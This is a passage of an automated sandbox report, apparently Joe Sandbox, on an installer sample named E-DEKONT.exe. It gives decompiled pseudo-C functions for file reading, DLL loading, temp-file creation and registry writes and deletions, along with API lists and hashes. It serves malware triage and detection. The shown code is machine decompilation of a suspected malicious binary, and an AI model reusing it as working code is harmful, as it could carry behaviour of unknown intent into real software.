                                                                            														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                            														__eax = 0xfffd;
                                                                            														 *(__ebp - 0x44) = 0xfffd;
                                                                            														if( *_t22 == 0) {
                                                                            															goto L22;
                                                                            														}
                                                                            														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                            														__esi = __esi + 1;
                                                                            														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
                                                                            														__ebp - 0x44 = __ebp + 0xa;
                                                                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
                                                                            															continue;
                                                                            														} else {
                                                                            															goto L21;
                                                                            														}
                                                                            														goto L22;
                                                                            													}
                                                                            												}
                                                                            												L22:
                                                                            												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                            													goto L28;
                                                                            												} else {
                                                                            													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                            														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                            															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                            															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
                                                                            														} else {
                                                                            															__ecx =  *(__ebp - 0xc);
                                                                            															__edx =  *(__ebp - 8);
                                                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														}
                                                                            														goto L34;
                                                                            													} else {
                                                                            														__ecx =  *(__ebp - 0xc);
                                                                            														__edx =  *(__ebp - 8);
                                                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                            														 *(__ebp - 0x30) = __eax;
                                                                            														if(__ax == __bx) {
                                                                            															goto L34;
                                                                            														} else {
                                                                            															goto L26;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L37;
                                                                            								L26:
                                                                            								__eax =  *(__ebp - 8);
                                                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                            						}
                                                                            						goto L34;
                                                                            					}
                                                                            				}
                                                                            				L37:
                                                                            				return 0;
                                                                            			}








                                                                            0x004026f6
                                                                            0x0040275c
                                                                            0x0040275f
                                                                            0x00000000
                                                                            0x00402761
                                                                            0x00402766
                                                                            0x004027a7
                                                                            0x004027c9
                                                                            0x004027d0
                                                                            0x004027b5
                                                                            0x004027b5
                                                                            0x004027b8
                                                                            0x004027bb
                                                                            0x004027be
                                                                            0x004027be
                                                                            0x00000000
                                                                            0x0040276f
                                                                            0x0040276f
                                                                            0x00402772
                                                                            0x00402775
                                                                            0x0040277b
                                                                            0x0040277f
                                                                            0x00402782
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402782
                                                                            0x00402766
                                                                            0x0040275f
                                                                            0x004026d7
                                                                            0x004026c3
                                                                            0x004026b8
                                                                            0x00000000
                                                                            0x00402784
                                                                            0x00402784
                                                                            0x00402787
                                                                            0x00402790
                                                                            0x00000000
                                                                            0x00402687
                                                                            0x00402672
                                                                            0x00402ac8
                                                                            0x00402ace

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                              • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 163830602-2366072709
                                                                            • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                            • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                            • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                            • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1008 4065ec-40660c GetSystemDirectoryW 1009 406610-406612 1008->1009 1010 40660e 1008->1010 1011 406623-406625 1009->1011 1012 406614-40661d 1009->1012 1010->1009 1014 406626-406659 wsprintfW LoadLibraryExW 1011->1014 1012->1011 1013 40661f-406621 1012->1013 1013->1014
                                                                            C-Code - Quality: 100%
                                                                            			E004065EC(intOrPtr _a4) {
                                                                            				short _v576;
                                                                            				signed int _t13;
                                                                            				struct HINSTANCE__* _t17;
                                                                            				signed int _t19;
                                                                            				void* _t24;
                                                                            
                                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                            				if(_t13 > 0x104) {
                                                                            					_t13 = 0;
                                                                            				}
                                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                            					_t19 = 1;
                                                                            				} else {
                                                                            					_t19 = 0;
                                                                            				}
                                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                            				return _t17;
                                                                            			}









                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                            • wsprintfW.USER32 ref: 0040663E
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                            • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1110 4057b5-405800 CreateDirectoryW 1111 405802-405804 1110->1111 1112 405806-405813 GetLastError 1110->1112 1113 40582d-40582f 1111->1113 1112->1113 1114 405815-405829 SetFileSecurityW 1112->1114 1114->1111 1115 40582b GetLastError 1114->1115 1115->1113
                                                                            C-Code - Quality: 100%
                                                                            			E004057B5(WCHAR* _a4) {
                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                            				int _t22;
                                                                            				long _t23;
                                                                            
                                                                            				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                            				_v36.Owner = 0x4083f0;
                                                                            				_v36.Group = 0x4083f0;
                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                            				_v36.Revision = 1;
                                                                            				_v36.Control = 4;
                                                                            				_v36.Dacl = 0x4083e0;
                                                                            				_v16.nLength = 0xc;
                                                                            				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                            				if(_t22 != 0) {
                                                                            					L1:
                                                                            					return 0;
                                                                            				}
                                                                            				_t23 = GetLastError();
                                                                            				if(_t23 == 0xb7) {
                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return _t23;
                                                                            			}








                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                            • GetLastError.KERNEL32 ref: 0040580C
                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                            • GetLastError.KERNEL32 ref: 0040582B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 3449924974-3370423016
                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                            • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1116 405da3-405daf 1117 405db0-405de4 GetTickCount GetTempFileNameW 1116->1117 1118 405df3-405df5 1117->1118 1119 405de6-405de8 1117->1119 1120 405ded-405df0 1118->1120 1119->1117 1121 405dea 1119->1121 1121->1120
                                                                            C-Code - Quality: 100%
                                                                            			E00405DA3(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                            				intOrPtr _v8;
                                                                            				short _v12;
                                                                            				short _t12;
                                                                            				intOrPtr _t13;
                                                                            				signed int _t14;
                                                                            				WCHAR* _t17;
                                                                            				signed int _t19;
                                                                            				signed short _t23;
                                                                            				WCHAR* _t26;
                                                                            
                                                                            				_t26 = _a4;
                                                                            				_t23 = 0x64;
                                                                            				while(1) {
                                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                                            					_t23 = _t23 - 1;
                                                                            					_v12 = _t12;
                                                                            					_t13 =  *0x40a55c; // 0x61
                                                                            					_v8 = _t13;
                                                                            					_t14 = GetTickCount();
                                                                            					_t19 = 0x1a;
                                                                            					_v8 = _v8 + _t14 % _t19;
                                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                            					if(_t17 != 0) {
                                                                            						break;
                                                                            					}
                                                                            					if(_t23 != 0) {
                                                                            						continue;
                                                                            					} else {
                                                                            						 *_t26 =  *_t26 & _t23;
                                                                            					}
                                                                            					L4:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = _t26;
                                                                            				goto L4;
                                                                            			}













                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405DC1
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\E-DEKONT.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF), ref: 00405DDC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-1127406209
                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                            • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                            			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                            				void _v36;
                                                                            				struct HINSTANCE__* _t34;
                                                                            				intOrPtr _t38;
                                                                            				void* _t44;
                                                                            				void* _t45;
                                                                            				void* _t46;
                                                                            				void* _t50;
                                                                            				intOrPtr _t53;
                                                                            				signed int _t57;
                                                                            				signed int _t61;
                                                                            				void* _t65;
                                                                            				void* _t66;
                                                                            				void* _t70;
                                                                            				void* _t74;
                                                                            
                                                                            				_t74 = __esi;
                                                                            				_t66 = __edi;
                                                                            				_t65 = __edx;
                                                                            				 *0x1000406c = _a8;
                                                                            				 *0x10004070 = _a16;
                                                                            				 *0x10004074 = _a12;
                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                                            				_push(1); // executed
                                                                            				_t34 = E10001B18(); // executed
                                                                            				_t50 = _t34;
                                                                            				if(_t50 == 0) {
                                                                            					L28:
                                                                            					return _t34;
                                                                            				} else {
                                                                            					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                            						E10002286(_t50);
                                                                            					}
                                                                            					_push(_t50);
                                                                            					E100022D0(_t65);
                                                                            					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                            					if(_t53 == 0xffffffff) {
                                                                            						L14:
                                                                            						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                                            							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                            								_t34 = E100024A4(_t50);
                                                                            							} else {
                                                                            								_push(_t74);
                                                                            								_push(_t66);
                                                                            								_t12 = _t50 + 0x1018; // 0x1018
                                                                            								_t57 = 8;
                                                                            								memcpy( &_v36, _t12, _t57 << 2);
                                                                            								_t38 = E100015B4(_t50);
                                                                            								_t15 = _t50 + 0x1018; // 0x1018
                                                                            								_t70 = _t15;
                                                                            								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                                            								 *_t70 = 4;
                                                                            								E100024A4(_t50);
                                                                            								_t61 = 8;
                                                                            								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                            							}
                                                                            						} else {
                                                                            							E100024A4(_t50);
                                                                            							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                            							_t34 = E10002467(_t50);
                                                                            							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                            								_t34 =  *(_t50 + 0x1008);
                                                                            								if(_t34 != 0) {
                                                                            									_t34 = FreeLibrary(_t34);
                                                                            								}
                                                                            							}
                                                                            							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                                            								_t34 = E1000153D( *0x10004068);
                                                                            							}
                                                                            						}
                                                                            						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                                            							goto L28;
                                                                            						} else {
                                                                            							return GlobalFree(_t50);
                                                                            						}
                                                                            					}
                                                                            					_t44 =  *_t50;
                                                                            					if(_t44 == 0) {
                                                                            						if(_t53 != 1) {
                                                                            							goto L14;
                                                                            						}
                                                                            						E10002B57(_t50);
                                                                            						L12:
                                                                            						_t50 = _t44;
                                                                            						L13:
                                                                            						goto L14;
                                                                            					}
                                                                            					_t45 = _t44 - 1;
                                                                            					if(_t45 == 0) {
                                                                            						L8:
                                                                            						_t44 = E1000289C(_t53, _t50); // executed
                                                                            						goto L12;
                                                                            					}
                                                                            					_t46 = _t45 - 1;
                                                                            					if(_t46 == 0) {
                                                                            						E10002640(_t50);
                                                                            						goto L13;
                                                                            					}
                                                                            					if(_t46 != 1) {
                                                                            						goto L14;
                                                                            					}
                                                                            					goto L8;
                                                                            				}
                                                                            			}


















                                                                            APIs
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                              • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                            • String ID:
                                                                            • API String ID: 1791698881-3916222277
                                                                            • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                            • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                            • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                            • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E00401C19(intOrPtr __edx) {
                                                                            				int _t29;
                                                                            				long _t30;
                                                                            				signed int _t32;
                                                                            				WCHAR* _t35;
                                                                            				long _t36;
                                                                            				int _t41;
                                                                            				signed int _t42;
                                                                            				int _t46;
                                                                            				int _t56;
                                                                            				intOrPtr _t57;
                                                                            				struct HWND__* _t61;
                                                                            				void* _t64;
                                                                            
                                                                            				_t57 = __edx;
                                                                            				_t29 = E00402C15(3);
                                                                            				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                            				 *(_t64 - 0x10) = _t29;
                                                                            				_t30 = E00402C15(4);
                                                                            				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                            				 *(_t64 + 8) = _t30;
                                                                            				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                            					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                                                            				}
                                                                            				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                            				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                            					 *(_t64 + 8) = E00402C37(0x44);
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                            				_push(1);
                                                                            				if(__eflags != 0) {
                                                                            					_t59 = E00402C37();
                                                                            					_t32 = E00402C37();
                                                                            					asm("sbb ecx, ecx");
                                                                            					asm("sbb eax, eax");
                                                                            					_t35 =  ~( *_t31) & _t59;
                                                                            					__eflags = _t35;
                                                                            					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                                            					goto L10;
                                                                            				} else {
                                                                            					_t61 = E00402C15();
                                                                            					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                            					_t41 = E00402C15(2);
                                                                            					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                            					_t56 =  *(_t64 - 0x14) >> 2;
                                                                            					if(__eflags == 0) {
                                                                            						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                            						L10:
                                                                            						 *(_t64 - 0x30) = _t36;
                                                                            					} else {
                                                                            						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                            						asm("sbb eax, eax");
                                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                            					}
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                            				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                            					_push( *(_t64 - 0x30));
                                                                            					E004061C9();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                            				return 0;
                                                                            			}
















                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                            • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                                            • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                                            • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                                                            				void* _t20;
                                                                            				void* _t21;
                                                                            				int _t24;
                                                                            				long _t25;
                                                                            				int _t30;
                                                                            				intOrPtr _t33;
                                                                            				void* _t34;
                                                                            				intOrPtr _t37;
                                                                            				void* _t39;
                                                                            				void* _t42;
                                                                            
                                                                            				_t33 = __edx;
                                                                            				_t30 = __ebx;
                                                                            				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                            				_t34 = __eax;
                                                                            				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                            				 *(_t39 - 0x3c) = E00402C37(2);
                                                                            				_t20 = E00402C37(0x11);
                                                                            				 *(_t39 - 4) = 1;
                                                                            				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
                                                                            				 *(_t39 + 8) = _t21;
                                                                            				if(_t21 != __ebx) {
                                                                            					_t24 = 0;
                                                                            					if(_t37 == 1) {
                                                                            						E00402C37(0x23);
                                                                            						_t24 = lstrlenW(0x40b5d0) + _t29 + 2;
                                                                            					}
                                                                            					if(_t37 == 4) {
                                                                            						 *0x40b5d0 = E00402C15(3);
                                                                            						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                            						_t24 = _t37;
                                                                            					}
                                                                            					if(_t37 == 3) {
                                                                            						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d0, 0x1800); // executed
                                                                            					}
                                                                            					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d0, _t24); // executed
                                                                            					if(_t25 == 0) {
                                                                            						 *(_t39 - 4) = _t30;
                                                                            					}
                                                                            					_push( *(_t39 + 8));
                                                                            					RegCloseKey();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                            				return 0;
                                                                            			}














                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000023,00000011,00000002), ref: 00402429
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402469
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp
                                                                            • API String ID: 2655323295-2936999414
                                                                            • Opcode ID: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                            • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                                            • Opcode Fuzzy Hash: d314daa77b1a5bddc68282b153224c2aabf702024f7a5803a7dd81a3f3e5214a
                                                                            • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                            				void* _v8;
                                                                            				short _v532;
                                                                            				void* _t19;
                                                                            				signed int _t26;
                                                                            				intOrPtr* _t28;
                                                                            				signed int _t33;
                                                                            				signed int _t34;
                                                                            				signed int _t35;
                                                                            
                                                                            				_t34 = _a12;
                                                                            				_t35 = _t34 & 0x00000300;
                                                                            				_t33 = _t34 & 0x00000001;
                                                                            				_t19 = E004060EF(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
                                                                            				if(_t19 == 0) {
                                                                            					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                                            						__eflags = _t33;
                                                                            						if(__eflags != 0) {
                                                                            							RegCloseKey(_v8);
                                                                            							return 1;
                                                                            						}
                                                                            						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                                                            						__eflags = _t26;
                                                                            						if(_t26 != 0) {
                                                                            							break;
                                                                            						}
                                                                            					}
                                                                            					RegCloseKey(_v8);
                                                                            					_t28 = E0040665C(3);
                                                                            					if(_t28 == 0) {
                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                            					}
                                                                            					return  *_t28(_a4, _a8, _t35, 0);
                                                                            				}
                                                                            				return _t19;
                                                                            			}












                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Enum
                                                                            • String ID:
                                                                            • API String ID: 464197530-0
                                                                            • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                            • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                            • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
                                                                            				void* _t17;
                                                                            				int _t23;
                                                                            				void* _t25;
                                                                            				signed char _t26;
                                                                            				short _t28;
                                                                            				short _t31;
                                                                            				short* _t34;
                                                                            				void* _t36;
                                                                            
